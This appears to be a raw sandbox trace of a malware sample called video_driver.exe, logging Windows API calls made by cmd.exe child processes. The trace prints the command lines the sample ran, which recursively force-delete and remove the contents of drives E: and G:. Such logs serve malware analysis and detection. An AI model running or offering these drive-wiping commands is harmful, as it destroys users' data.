GetEnvironmentStringsW () returned 0x6a20f8* [0067.037] GetProcessHeap () returned 0x690000 [0067.037] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xaca) returned 0x6a36a8 [0067.037] FreeEnvironmentStringsW (penv=0x6a20f8) returned 1 [0067.037] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce734 | out: phkResult=0x2ce734*=0x68) returned 0x0 [0067.037] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x0, lpData=0x2ce740*=0x0, lpcbData=0x2ce738*=0x1000) returned 0x2 [0067.037] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x4, lpData=0x2ce740*=0x1, lpcbData=0x2ce738*=0x4) returned 0x0 [0067.037] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x0, lpData=0x2ce740*=0x1, lpcbData=0x2ce738*=0x1000) returned 0x2 [0067.037] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x4, lpData=0x2ce740*=0x0, lpcbData=0x2ce738*=0x4) returned 0x0 [0067.037] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x4, lpData=0x2ce740*=0x40, lpcbData=0x2ce738*=0x4) returned 0x0 [0067.038] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x4, lpData=0x2ce740*=0x40, lpcbData=0x2ce738*=0x4) returned 0x0 [0067.038] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x0, lpData=0x2ce740*=0x40, lpcbData=0x2ce738*=0x1000) returned 0x2 [0067.038] RegCloseKey (hKey=0x68) returned 0x0 [0067.038] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce734 | out: phkResult=0x2ce734*=0x68) returned 0x0 [0067.038] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x0, lpData=0x2ce740*=0x40, lpcbData=0x2ce738*=0x1000) returned 0x2 [0067.038] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x4, lpData=0x2ce740*=0x1, lpcbData=0x2ce738*=0x4) returned 0x0 [0067.038] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x0, lpData=0x2ce740*=0x1, lpcbData=0x2ce738*=0x1000) returned 0x2 [0067.038] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x4, lpData=0x2ce740*=0x0, lpcbData=0x2ce738*=0x4) returned 0x0 [0067.038] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x4, lpData=0x2ce740*=0x9, lpcbData=0x2ce738*=0x4) returned 0x0 [0067.038] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x4, lpData=0x2ce740*=0x9, lpcbData=0x2ce738*=0x4) returned 0x0 [0067.038] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce73c, lpData=0x2ce740, lpcbData=0x2ce738*=0x1000 | out: lpType=0x2ce73c*=0x0, lpData=0x2ce740*=0x9, lpcbData=0x2ce738*=0x1000) returned 0x2 [0067.038] RegCloseKey (hKey=0x68) returned 0x0 [0067.038] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6c [0067.038] srand (_Seed=0x5eb34b6c) [0067.038] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"E:\" del /f /s /q \"E:\" & FOR /D %p IN (\"E:\") DO rmdir \"%p\" /s /q" [0067.038] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"E:\" del /f /s /q \"E:\" & FOR /D %p IN (\"E:\") DO rmdir \"%p\" /s /q" [0067.039] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.039] GetProcessHeap () returned 0x690000 [0067.039] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x210) returned 0x6a20f8 [0067.039] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6a2100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0067.039] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0067.039] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0067.039] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.039] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0067.039] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0067.039] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0067.039] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0067.039] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0067.039] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0067.039] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0067.039] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0067.039] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0067.040] GetProcessHeap () returned 0x690000 [0067.040] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2bd0 | out: hHeap=0x690000) returned 1 [0067.040] GetEnvironmentStringsW () returned 0x6a2310* [0067.040] GetProcessHeap () returned 0x690000 [0067.040] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xae2) returned 0x6a4c70 [0067.040] FreeEnvironmentStringsW (penv=0x6a2310) returned 1 [0067.040] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0067.040] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.040] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0067.040] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0067.040] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0067.040] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0067.040] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0067.040] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0067.040] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0067.040] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0067.040] GetProcessHeap () returned 0x690000 [0067.040] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x54) returned 0x6a17c8 [0067.040] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf500 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.041] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf500, lpFilePart=0x2cf4fc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cf4fc*="Desktop") returned 0x25 [0067.041] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0067.041] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf27c | out: lpFindFileData=0x2cf27c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6a5760 [0067.041] FindClose (in: hFindFile=0x6a5760 | out: hFindFile=0x6a5760) returned 1 [0067.041] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2cf27c | out: lpFindFileData=0x2cf27c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6a5760 [0067.041] FindClose (in: hFindFile=0x6a5760 | out: hFindFile=0x6a5760) returned 1 [0067.041] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0067.041] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2cf27c | out: lpFindFileData=0x2cf27c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6a5760 [0067.041] FindClose (in: hFindFile=0x6a5760 | out: hFindFile=0x6a5760) returned 1 [0067.042] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0067.042] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0067.042] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0067.042] GetProcessHeap () returned 0x690000 [0067.042] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4c70 | out: hHeap=0x690000) returned 1 [0067.042] GetEnvironmentStringsW () returned 0x6a4180* [0067.042] GetProcessHeap () returned 0x690000 [0067.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb36) returned 0x6a5fa0 [0067.042] FreeEnvironmentStringsW (penv=0x6a4180) returned 1 [0067.042] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.042] GetProcessHeap () returned 0x690000 [0067.042] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a17c8 | out: hHeap=0x690000) returned 1 [0067.042] GetProcessHeap () returned 0x690000 [0067.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x400e) returned 0x6a6ae0 [0067.043] GetProcessHeap () returned 0x690000 [0067.043] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa0) returned 0x6a2e50 [0067.043] GetProcessHeap () returned 0x690000 [0067.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6ae0 | out: hHeap=0x690000) returned 1 [0067.043] GetConsoleOutputCP () returned 0x1b5 [0067.043] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.043] GetUserDefaultLCID () returned 0x409 [0067.044] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0067.044] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf640, cchData=128 | out: lpLCData="0") returned 2 [0067.044] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf640, cchData=128 | out: lpLCData="0") returned 2 [0067.044] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf640, cchData=128 | out: lpLCData="1") returned 2 [0067.044] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0067.044] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0067.045] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0067.045] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0067.045] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0067.045] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0067.045] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0067.045] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0067.045] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0067.045] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0067.045] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0067.046] GetProcessHeap () returned 0x690000 [0067.046] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20c) returned 0x6a2ef8 [0067.046] GetConsoleTitleW (in: lpConsoleTitle=0x6a2ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0067.047] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0067.047] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0067.047] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0067.047] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0067.047] GetProcessHeap () returned 0x690000 [0067.047] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x400a) returned 0x6a6ae0 [0067.048] GetProcessHeap () returned 0x690000 [0067.048] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4008) returned 0x6aaaf8 [0067.048] GetProcessHeap () returned 0x690000 [0067.048] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x1a) returned 0x6a57e0 [0067.048] GetEnvironmentVariableW (in: lpName="p IN (\"E", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.048] _wcsicmp (_String1="p IN (\"E", _String2="CD") returned 13 [0067.048] _wcsicmp (_String1="p IN (\"E", _String2="ERRORLEVEL") returned 11 [0067.048] _wcsicmp (_String1="p IN (\"E", _String2="CMDEXTVERSION") returned 13 [0067.048] _wcsicmp (_String1="p IN (\"E", _String2="CMDCMDLINE") returned 13 [0067.048] _wcsicmp (_String1="p IN (\"E", _String2="DATE") returned 12 [0067.048] _wcsicmp (_String1="p IN (\"E", _String2="TIME") returned -4 [0067.048] _wcsicmp (_String1="p IN (\"E", _String2="RANDOM") returned -2 [0067.048] _wcsicmp (_String1="p IN (\"E", _String2="HIGHESTNUMANODENUMBER") returned 8 [0067.048] GetProcessHeap () returned 0x690000 [0067.048] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a57e0 | out: hHeap=0x690000) returned 1 [0067.048] GetProcessHeap () returned 0x690000 [0067.048] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aaaf8 | out: hHeap=0x690000) returned 1 [0067.049] GetProcessHeap () returned 0x690000 [0067.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4008) returned 0x6aaaf8 [0067.049] GetProcessHeap () returned 0x690000 [0067.049] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aaaf8 | out: hHeap=0x690000) returned 1 [0067.049] GetProcessHeap () returned 0x690000 [0067.049] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6ae0 | out: hHeap=0x690000) returned 1 [0067.049] _wcsicmp (_String1="if", _String2=")") returned 64 [0067.049] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0067.049] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0067.049] _wcsicmp (_String1="IF", _String2="if") returned 0 [0067.049] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0067.049] GetProcessHeap () returned 0x690000 [0067.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x6a3110 [0067.049] GetProcessHeap () returned 0x690000 [0067.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xe) returned 0x69ffc0 [0067.050] GetProcessHeap () returned 0x690000 [0067.050] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x20) returned 0x6a57e0 [0067.050] GetProcessHeap () returned 0x690000 [0067.050] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6a57e0, Size=0x16) returned 0x6a1800 [0067.050] GetProcessHeap () returned 0x690000 [0067.050] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x6a1800) returned 0x16 [0067.050] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0067.051] GetProcessHeap () returned 0x690000 [0067.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x6a3170 [0067.051] GetProcessHeap () returned 0x690000 [0067.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x14) returned 0x6a31d0 [0067.051] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0067.051] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0067.051] GetProcessHeap () returned 0x690000 [0067.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x12) returned 0x6a31f0 [0067.051] GetProcessHeap () returned 0x690000 [0067.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x1c) returned 0x6a57e0 [0067.051] GetProcessHeap () returned 0x690000 [0067.051] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6a57e0, Size=0x14) returned 0x6a3210 [0067.051] GetProcessHeap () returned 0x690000 [0067.051] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x6a3210) returned 0x14 [0067.052] _wcsicmp (_String1="del", _String2=")") returned 59 [0067.052] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0067.052] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0067.052] _wcsicmp (_String1="IF", _String2="del") returned 5 [0067.052] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0067.052] _wcsicmp (_String1="REM", _String2="del") returned 14 [0067.052] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0067.052] GetProcessHeap () returned 0x690000 [0067.052] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x6a3230 [0067.052] GetProcessHeap () returned 0x690000 [0067.052] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x10) returned 0x69ffd8 [0067.053] GetProcessHeap () returned 0x690000 [0067.053] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x28) returned 0x6a3290 [0067.053] GetProcessHeap () returned 0x690000 [0067.053] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x6a32c0 [0067.054] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0067.054] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0067.054] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0067.054] GetProcessHeap () returned 0x690000 [0067.054] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x6a3320 [0067.054] GetProcessHeap () returned 0x690000 [0067.054] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x44) returned 0x6a3380 [0067.054] GetProcessHeap () returned 0x690000 [0067.054] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x14) returned 0x6a33d0 [0067.055] GetProcessHeap () returned 0x690000 [0067.055] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6a33d0, Size=0x12) returned 0x6a33d0 [0067.055] GetProcessHeap () returned 0x690000 [0067.055] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x6a33d0) returned 0x12 [0067.055] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0067.055] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0067.055] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0067.055] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0067.055] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0067.055] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0067.055] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0067.056] GetProcessHeap () returned 0x690000 [0067.056] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x12) returned 0x6a33f0 [0067.056] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0067.056] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0067.057] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0067.057] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0067.057] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0067.057] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0067.057] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0067.057] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0067.057] GetProcessHeap () returned 0x690000 [0067.057] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x6a3410 [0067.057] GetProcessHeap () returned 0x690000 [0067.057] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x14) returned 0x6a3470 [0067.057] GetProcessHeap () returned 0x690000 [0067.057] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x20) returned 0x6a57e0 [0067.059] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0067.061] GetFullPathNameW (in: lpFileName="E:", nBufferLength=0x208, lpBuffer=0x2cf330, lpFilePart=0x2cf0dc | out: lpBuffer="E:\\", lpFilePart=0x2cf0dc*=0x0) returned 0x3 [0067.061] wcsncmp (_String1="E:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -23 [0067.065] GetFileAttributesW (lpFileName="E:\\" (normalized: "e:")) returned 0xffffffff [0067.065] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.065] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0067.066] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.066] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0067.066] _get_osfhandle (_FileHandle=0) returned 0x3 [0067.066] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0067.066] SetConsoleInputExeNameW () returned 0x1 [0067.066] GetConsoleOutputCP () returned 0x1b5 [0067.066] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.066] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.067] exit (_Code=0) Process: id = "51" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x41b5e000" os_pid = "0xaa0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"G:\" del /f /s /q \"G:\" & FOR /D %p IN (\"G:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 79 os_tid = 0xa9c [0067.156] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32fb24 | out: lpSystemTimeAsFileTime=0x32fb24*(dwLowDateTime=0x5d6bf40, dwHighDateTime=0x1d62400)) [0067.156] GetCurrentProcessId () returned 0xaa0 [0067.156] GetCurrentThreadId () returned 0xa9c [0067.156] GetTickCount () returned 0x1148373 [0067.156] QueryPerformanceCounter (in: lpPerformanceCount=0x32fb1c | out: lpPerformanceCount=0x32fb1c*=18728921795) returned 1 [0067.157] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0067.157] __set_app_type (_Type=0x1) [0067.157] __p__fmode () returned 0x770331f4 [0067.157] __p__commode () returned 0x770331fc [0067.157] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0067.158] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0067.158] GetCurrentThreadId () returned 0xa9c [0067.158] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa9c) returned 0x60 [0067.158] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0067.158] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0067.158] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.159] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0067.159] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x32fab4 | out: phkResult=0x32fab4*=0x0) returned 0x2 [0067.159] VirtualQuery (in: lpAddress=0x32faeb, lpBuffer=0x32fa84, 